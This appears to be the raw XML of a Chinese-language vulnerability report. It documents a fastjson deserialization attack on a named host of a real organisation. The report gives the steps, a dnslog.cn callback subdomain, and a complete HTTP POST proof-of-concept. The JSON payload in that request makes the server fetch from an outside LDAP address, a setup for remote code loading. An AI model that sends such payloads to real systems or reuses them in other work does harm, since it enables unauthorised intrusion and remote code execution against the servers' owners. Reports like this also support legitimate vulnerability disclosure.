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漏洞http://testeip.chinatowercom.cn:17590/iserver/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.dnslog.cn" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www.dnslog.cn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>生成个目标</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>zi6tti.dnslog.cn</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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113915"/>
            <wp:effectExtent l="0" t="0" r="5080" b="635"/>
            <wp:docPr id="2" name="图片 2" descr="FHGPCH}FFD~O4]0V41B8)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HGPCH}FFD~O4]0V41B8)K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用fastjson工具生成Payload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633980"/>
            <wp:effectExtent l="0" t="0" r="9525" b="13970"/>
            <wp:docPr id="3" name="图片 3" descr="$MA1_FVLX2)W1~O$Q@OY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MA1_FVLX2)W1~O$Q@OYUR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"http://testeip.chinatowercom.cn:17590/iserver/"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http://testeip.chinatowercom.cn:17590/iserver/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包改</w:t>
      </w:r>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry": "ldap://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zi6tti.dnslog.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>/Exploit"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>OC: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POST /iserver/ HTTP/1.1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 xml:space="preserve">Host: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>http://testeip.chinatowercom.cn:17590/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Cache-Control: max-age=0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Upgrade-Insecure-Requests: 1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry": "ldap://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zi6tti.dnslog.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
        <w:t>/Exploit"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2499360"/>
            <wp:effectExtent l="0" t="0" r="5715" b="15240"/>
            <wp:docPr id="4" name="图片 4" descr="7O9YCN[LV_4NOT~2]W}PN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O9YCN[LV_4NOT~2]W}PN]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F0"/>
    <w:rsid w:val="002F32E8"/>
    <w:rsid w:val="00964645"/>
    <w:rsid w:val="00972714"/>
    <w:rsid w:val="009F5BF0"/>
    <w:rsid w:val="00DC20BF"/>
    <w:rsid w:val="00E861AF"/>
    <w:rsid w:val="506E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891</Characters>
  <DocSecurity>0</DocSecurity>
  <Lines>7</Lines>
  <Paragraphs>2</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1045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2021-11-29T09:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-13T15:06:37Z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652494A65A1143B0B635E6C7CE1A2CF7</vt:lpwstr>
  </property>
</Properties>
</file>